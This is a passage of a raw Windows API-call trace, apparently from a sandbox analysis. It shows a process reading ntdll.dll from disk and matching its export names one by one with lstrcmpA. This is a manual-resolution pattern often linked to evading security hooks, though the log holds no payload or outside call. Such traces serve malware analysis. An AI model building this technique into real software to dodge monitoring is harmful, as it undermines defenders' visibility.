returned 1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0270.141] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0270.142] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0270.295] GetProcessHeap () returned 0x470000 [0270.295] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c2040 | out: hHeap=0x470000) returned 1 [0270.301] GetProcessHeap () returned 0x470000 [0270.301] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489220 [0270.302] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0270.302] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0270.302] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0270.302] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0270.303] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0270.304] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0270.304] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0270.304] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0270.304] GetProcessHeap () returned 0x470000 [0270.304] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bba48) returned 0x40ca040 [0270.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0270.309] ReadFile (in: hFile=0x140, lpBuffer=0x40ca040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ca040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0270.453] CloseHandle (hObject=0x140) returned 1 [0270.453] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0270.453] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0270.453] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0270.453] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0270.453] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0270.453] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0270.454] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0270.454] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0270.454] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0270.454] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0270.454] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0270.454] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0270.454] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0270.455] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.455] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0270.455] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0270.455] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0270.455] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0270.455] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.455] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.455] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0270.456] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0270.456] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0270.456] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0270.456] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.456] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.456] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.456] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0270.456] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0270.457] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.457] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0270.458] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.459] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0270.459] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0270.459] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0270.459] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.460] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0270.460] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0270.460] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0270.460] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0270.460] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.461] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.461] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.462] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0270.463] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0270.463] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0270.463] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0270.463] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0270.463] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.463] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.464] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.464] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.464] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0270.464] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0270.464] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.464] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.464] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.465] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0270.466] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0270.466] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0270.466] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0270.467] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0270.467] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0270.468] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 